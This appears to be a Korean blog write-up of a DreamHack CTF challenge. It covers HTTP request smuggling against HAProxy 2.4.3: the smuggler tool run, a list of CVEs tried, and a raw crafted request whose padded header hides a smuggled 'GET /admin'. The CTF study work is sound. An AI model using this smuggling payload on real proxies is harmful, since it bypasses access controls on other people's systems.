1. 코드 확인
- /admin 호출시 /routes/admin.js 파일 호출
- /flag 호출 시 /routes/flag.js 파일 호출
- getBalance() > 10 이상이어야 함
- charge 를 통해 balance 추가 시도필요
- docker-compose.yml 파일 통해 (haproxy : 2.4.3 확인)
2. HRS 공격 : HRS 공격을 통해, /charge 및, /admin 호출 목적
- auth 는 /admin 호출하면 되는거 아닌가 했었음
1) smuggler-master 수행
https://github.com/defparam/smuggler
GitHub - defparam/smuggler: Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3
Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3 - defparam/smuggler
github.com
python3 smuggler.py -u <URL>- TE-CL, CL-TE 관련 HRS 취약점 발견되지 않음
2)
Haproxy 버져 관련 취약점 모두 수행 실패
2023-25725 : X
2023-25950 : X
2021-40346 : X
2023-40225 : X
2021-39242 : X
2021-39241 : X
2021-39240 : X
POST / HTTP/1.1
Host: host3.dreamhack.games:23442
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiZ3Vlc3QiLCJpYXQiOjE3MDY5NDgyODF9.X6nL5kDEFYNcMKI5_ddig6RQXC2ogaRAkYbxDmcFt1byunwEHibInhF13CJd4mvrDIhYLKvAx-i1lkgX1Nyhb39X5Yx8EUcxBUf4wucQ6e1ps-MsQZF7FMy_bc4g3dp1y_RguCLx95F4mZo60rmO8DxGDkenctZq8i1mQk5UlpsASm7vhKgDZF2k8N-UiDaKTFBYzA5sUQuYFhnDYGwbHWHuRafSGhT0nX4stzykoH2RLz-S4TAHrcPCzQLvRrffBdqEfKDM_-Os5pvJlkpPYWKGniU7tc6GnvIbaGKt2J7aH8i3RN45wmUrJFOe-Oz-ewg2JjXXtuAznMzmsouxxw
If-None-Match: W/"1f-VY9YVxhwLs5YIwdLsP7GaziYuyk"
Connection: close
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 56
GET /admin
Host: host3.dreamhack.games:23442
abc : fooGET /admin HTTP/1.1 / HTTP/1.1
Host: host3.dreamhack.games:23442
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
'Hacking > DreamHack' 카테고리의 다른 글
| no mov (1) | 2024.04.24 |
|---|---|
| uaf_overwrite (1) | 2024.04.09 |
| rev-basic-3 (0) | 2024.04.09 |
| What-is-my-ip(5Round CTF) (0) | 2024.03.30 |
| 02/24 CTF (0) | 2024.02.24 |
